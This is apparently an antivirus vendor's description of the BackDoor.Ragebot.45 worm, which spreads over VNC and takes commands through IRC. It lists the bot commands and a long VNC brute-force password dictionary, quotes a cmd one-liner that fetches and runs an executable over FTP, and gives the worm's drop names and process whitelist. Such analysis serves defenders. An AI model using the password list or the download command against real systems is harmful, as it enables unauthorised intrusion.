SHA1:
- d76cd59412a96e33858939c791ef7ff1e529e0d4
The worm that infects Microsoft Windows computers. It is spread by using the Virtual Network Computing (VNC) technology and received commands via the IRC (Internet Relay Chat) protocol. The worm can execute the following commands:
- !commands – display information on received commands;
- !botinfo – display information about itself;
- !rarworm - infect RAR archives;
- !xpl – execute a brute force attack and infect VNC nodes;
- !p2p – infect P2P clients;
- !vncstop - stop scanning VNC hosts;
- !disconnect – break the connection;
- !reconnect – restore the connection;
- !restart – relaunch itself;
- !part – leave the specified chat channels;
- !join – connect to the IRC channel;
- !b0tk1ller – kill processes according to the list;
- !nick – name the Trojan on the IRC channel;
- !h<password> – remove or download an executable file (where password is an authorization password).
Once the computer is infected, BackDoor.Ragebot.45 runs an FTP server and uses it to download its copy on the machine.
If the Trojan receives the command xpl, it scans subnetworks for the presence of nodes with the open port 5900. If these nodes are detected, the worm tries to establish the VCN connection via a brute force attack.
linux
ab
a
root
r00t
vnc
pw
login
abc
abcd
1
admin
pass
123
1234
12345
123456
1234567
12345678
1111
11111111
password
Password1
Princess1
P@ssw0rd
Passw0rd
Michael1
Blink182
!QAZ2wsx
Charlie1
Anthony1
1qaz!QAZ
Brandon1
Jordan23
1qaz@WSX
Jessica1
Jasmine1
Michelle1
Diamond1
Babygirl1
Iloveyou2
Matthew1
Rangers1
Pa55word
Iverson3
Sunshine1
Madison1
William1
Elizabeth1
Password123
Liverpool1
Cameron1
Butterfly1
Beautiful1
!QAZ1qaz
Patrick1
Welcome1
Iloveyou1
Bubbles1
Chelsea1
ZAQ!2wsx
Blessed1
Richard1
Danielle1
Raiders1
Jackson1
Jesus777
Jennifer1
Alexander1
Ronaldo7
Heather1
Dolphin1
Destiny1
Brianna1
Trustno1
1qazZAQ!
Precious1
Freedom1
Christian1
Brooklyn1
!QAZxsw2
Password2
Football1
ABCabc123
Samantha1
Charmed1
Trinity1
Chocolate1
America1
Password01
Natalie1
Superman1
Scooter1
Mustang1
Brittany1
Angel123
Jonathan1
Friends1
Courtney1
Aaliyah1
Rebecca1
Timothy1
Scotland1
Raymond1
Inuyasha1
Tiffany1
Pa55w0rd
Nicholas1
Melissa1
Isabella1
Summer07
Rainbow1
Poohbear1
Peaches1
Gabriel1
Arsenal1
Antonio1
Victoria1
Stephanie1
Dolphins1
ABC123abc
Spongebob1
Pa$$w0rd
Forever1
iydgTvmujl6f
Zachary1
Yankees1
Stephen1
Shannon1
John3:16
Gerrard8
Fuckyou2
ZAQ!1qaz
Pebbles1
Monster1
Chicken1
zaq1!QAZ
Spencer1
Savannah1
Jesusis1
Jeffrey1
Houston1
Florida1
Crystal1
Tristan1
Thunder1
Thumper1
Special1
Pr1ncess
Password12
Justice1
Cowboys1
Charles1
Blondie1
Softball1
Orlando1
Greenday1
Dominic1
!QAZzaq1
abc123ABC
Snickers1
Patches1
P@$$w0rd
Natasha1
Myspace1
Monique1
Letmein1
James123
Celtic1888
Benjamin1
Baseball1
1qazXSW@
Vanessa1
Steelers1
Slipknot1
Princess13
Princess12
Midnight1
Marines1
M1chelle
Lampard8
Jesus123
Frankie1
Elizabeth2
Douglas1
Devil666
Christina1
Bradley1
zaq1@WSX
Tigger01
Summer08
Princess21
Playboy1
October1
Katrina1
Iloveme1
Chris123
Chicago1
Charlotte1
Broncos1
BabyGirl1
Abigail1
Tinkerbel11
Rockstar1
RockYou1
Michelle2
Georgia1
Computer1
Breanna1
Babygurl1
Trinity3
Pumpkin1
Princess7
Preston1
Newyork1
Marissa1
Liberty1
Lebron23
Jamaica1
Fuckyou1
Chester1
Braxton1
August12
z,iyd86I
l6fkiy9oN
Sweetie1
November1
Love4ever
Ireland1
Iloveme2
Christine1
Buttons1
Babyboy1
Angel101
Vincent1
Spartan117
Soccer12
Princess2
Penguin1
Password5
Password3
Panthers1
Nirvana1
Nicole12
Nichole1
Molly123
Metallica1
Mercedes1
Mackenzie1
Kenneth1
Jackson5
Genesis1
Diamonds1
Buttercup1
Brandon7
Whatever1
TheSims2
Summer06
Starwars1
Spiderman1
Soccer11
Skittles1
Princess01
Phoenix1
Pass1234
Panther1
November11
Lindsey1
Katherine1
JohnCena1
January1
Gangsta1
Fuckoff1
Freddie1
Forever21
Death666
Chopper1
Arianna1
Allison1
Yankees2
TrustNo1
Tiger123
Summer05
September1
Sebastian1
Sabrina1
Princess07
Popcorn1
Pokemon1
Omarion1
Nursing1
Miranda1
Melanie1
Maxwell1
Lindsay1
Joshua01
Once the connection is established, the Trojan sends keystrokes signals, using them to run the CMD command interpreter and execute the code for launching its copy over the FTP protocol:
cmd /c echo open ftp.yourserver.com 21 >> ik &echo user USERNAME PASSWORD >> ik &echo binary >> ik &echo get EXENAME.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &EXENAME.exe &exit
One more function of BackDoor.Ragebot.45 is to search and infect RAR archives on removable media. When detecting an archive, the Trojan saves a copy named as follows:
setup.exe
installer.exe
self-installer.exe
self-extractor.exe
Once launched, the Trojan saves its copy to the following folders (if present):
\Program Files\LimeWire\Shared
\Program Files\eDonkey2000\incoming
\Program Files\KAZAA
\Program Files\Morpheus\My Shared Folder\
\Program Files\BearShare\Shared\
\Program Files\ICQ\Shared Files\
\Program Files\Grokster\My Grokster\
\My Downloads\
The worm removes processes and executable files of other malicious programs. However, it has white lists of application names which it ignores, allowing them to operate on the infected computer:
accwiz.exe
actmovie.exe
ahui.exe
alg.exe
append.exe
arp.exe
asr_fmt.exe
asr_ldm.exe
asr_pfu.exe
at.exe
ati2evxx.exe
Ati2mdxx.exe
atmadm.exe
attrib.exe
auditusr.exe
autochk.exe
autoconv.exe
autofmt.exe
autolfn.exe
blastcln.exe
bootcfg.exe
bootok.exe
bootvrfy.exe
cacls.exe
calc.exe
charmap.exe
ChCfg.exe
chkdsk.exe
chkntfs.exe
cidaemon.exe
cipher.exe
cisvc.exe
ckcnv.exe
cleanmgr.exe
cliconfg.exe
clipbrd.exe
clipsrv.exe
clspack.exe
cmd.exe
cmdl32.exe
cmmon32.exe
cmstp.exe
comp.exe
compact.exe
conime.exe
control.exe
convert.exe
cscript.exe
csrss.exe
ctfmon.exe
dcomcnfg.exe
ddeshare.exe
debug.exe
defrag.exe
dfrgfat.exe
dfrgntfs.exe
diantz.exe
diskpart.exe
diskperf.exe
dllhost.exe
dllhst3g.exe
dmadmin.exe
dmremote.exe
doskey.exe
dosx.exe
dplaysvr.exe
dpnsvr.exe
dpvsetup.exe
driverquery.exe
drwatson.exe
drwtsn32.exe
dumprep.exe
dvdplay.exe
dvdupgrd.exe
dwwin.exe
dxdiag.exe
edlin.exe
esentutl.exe
eudcedit.exe
eventcreate.exe
eventtriggers.exe
eventvwr.exe
exe2bin.exe
expand.exe
extrac32.exe
fastopen.exe
fc.exe
find.exe
findstr.exe
finger.exe
fixmapi.exe
fltMc.exe
fontview.exe
forcedos.exe
freecell.exe
fsquirt.exe
fsutil.exe
ftp.exe
gb2312.uce
gdi.exe
getmac.exe
gpresult.exe
gpupdate.exe
grpconv.exe
help.exe
hostname.exe
ie4uinit.exe
iexpress.exe
imapi.exe
ipconfig.exe
ipsec6.exe
ipv6.exe
ipxroute.exe
java.exe
javaw.exe
javaws.exe
jdbgmgr.exe
jview.exe
krnl386.exe
label.exe
lights.exe
lnkstub.exe
locator.exe
lodctr.exe
logagent.exe
logman.exe
logoff.exe
logonui.exe
lpq.exe
lpr.exe
lsass.exe
magnify.exe
makecab.exe
mem.exe
migpwd.exe
mmc.exe
mnmsrvc.exe
mobsync.exe
mountvol.exe
mplay32.exe
mpnotify.exe
mqbkup.exe
mqsvc.exe
mqtgsvc.exe
mrinfo.exe
MRT.exe
mscdexnt.exe
msdtc.exe
msg.exe
mshearts.exe
mshta.exe
msiexec.exe
mspaint.exe
msswchx.exe
mstinit.exe
mstsc.exe
narrator.exe
nbtstat.exe
nddeapir.exe
NeroCheck.exe
net.exe
net1.exe
netdde.exe
netsetup.exe
netsh.exe
netstat.exe
nlsfunc.exe
notepad.exe
nslookup.exe
ntbackup.exe
ntkrnlpa.exe
ntoskrnl.exe
ntsd.exe
ntvdm.exe
nw16.exe
nwscript.exe
odbcad32.exe
odbcconf.exe
openfiles.exe
osk.exe
osuninst.exe
packager.exe
pathping.exe
pentnt.exe
perfmon.exe
ping.exe
ping6.exe
powercfg.exe
print.exe
progman.exe
proquota.exe
proxycfg.exe
qappsrv.exe
qprocess.exe
qwinsta.exe
rasautou.exe
rasdial.exe
rasphone.exe
rcimlby.exe
rcp.exe
rdpclip.exe
rdsaddin.exe
rdshost.exe
recover.exe
redir.exe
reg.exe
REGCLADM.EXE
regedt32.exe
regini.exe
regsvr32.exe
regwiz.exe
relog.exe
replace.exe
reset.exe
rexec.exe
route.exe
routemon.exe
rsh.exe
rsm.exe
rsmsink.exe
rsmui.exe
rsnotify.exe
rsopprov.exe
rsvp.exe
rtcshare.exe
RTLCPL.EXE
runas.exe
rundll32.exe
runonce.exe
rwinsta.exe
savedump.exe
sc.exe
scardsvr.exe
schtasks.exe
sdbinst.exe
secedit.exe
services.exe
sessmgr.exe
sethc.exe
setup.exe
setver.exe
sfc.exe
shadow.exe
share.exe
shmgrate.exe
shrpubw.exe
shutdown.exe
sigverif.exe
skeys.exe
smbinst.exe
smlogsvc.exe
smss.exe
sndrec32.exe
sndvol32.exe
sol.exe
sort.exe
spider.exe
spiisupd.exe
spnpinst.exe
spoolsv.exe
sprestrt.exe
spupdsvc.exe
stimon.exe
subrange.uce
subst.exe
svchost.exe
syncapp.exe
sysedit.exe
syskey.exe
sysocmgr.exe
systeminfo.exe
systray.exe
taskkill.exe
tasklist.exe
taskman.exe
taskmgr.exe
tcmsetup.exe
tcpsvcs.exe
telnet.exe
tftp.exe
tlntadmn.exe
tlntsess.exe
tlntsvr.exe
tourstart.exe
tracerpt.exe
tracert.exe
tracert6.exe
tscon.exe
tscupgrd.exe
tsdiscon.exe
tskill.exe
tsshutdn.exe
typeperf.exe
unlodctr.exe
upnpcont.exe
ups.exe
user.exe
userinit.exe
usrmlnka.exe
usrprbda.exe
usrshuta.exe
utilman.exe
verclsid.exe
verifier.exe
viral.exe
vssadmin.exe
vssvc.exe
vwipxspx.exe
w32tm.exe
wextract.exe
wiaacmgr.exe
winchat.exe
WINDBVER.EXE
winhlp32.exe
winlogon.exe
winmine.exe
winmsd.exe
winspool.exe
winver.exe
wjview.exe
wowdeb.exe
wowexec.exe
wpabaln.exe
wpnpinst.exe
write.exe
wscntfy.exe
wscript.exe
wuauclt.exe
wuauclt1.exe
wupdmgr.exe
xcopy.exe
ACDSee.scr
logon.scr
scrnsave.scr
SeismoSaver.scr
ss3dfo.scr
ssbezier.scr
ssflwbox.scr
ssmarque.scr
ssmypics.scr
ssmyst.scr
MDM.exe
sspipes.scr
ssstars.scr
sstext3d.scr
McAfee.exe
w32services.exe
wss.exe
w32service.exe
winups.exe
loser.exe
shvhost.exe
System
alcrmv.exe
alcupd.exe
explorer.exe
hh.exe
IsUninst.exe
iun6002.exe
NOTEPAD.EXE
regedit.exe
REGTLIB.EXE
setdebug.exe
Setup1.exe
SOUNDMAN.EXE
ST6UNST.EXE
TASKMAN.EXE
twunk_16.exe
twunk_32.exe
MDM.exe
winhelp.exe
winhlp32.exe
w32services.exe
alcrmv.exe
alcupd.exe
explorer.exe
hh.exe
IsUninst.exe
iun6002.exe
NOTEPAD.EXE
regedit.exe
REGTLIB.EXE
setdebug.exe
Setup1.exe
SOUNDMAN.EXE
ST6UNST.EXE
TASKMAN.EXE
twunk_16.exe
twunk_32.exe
MDM.exe
winhelp.exe
winhlp32.exe
w32services.exe
wss.exe
McAfee.exe
w32service.exe
winups.exe
loser.exe
shvhost.exe
System
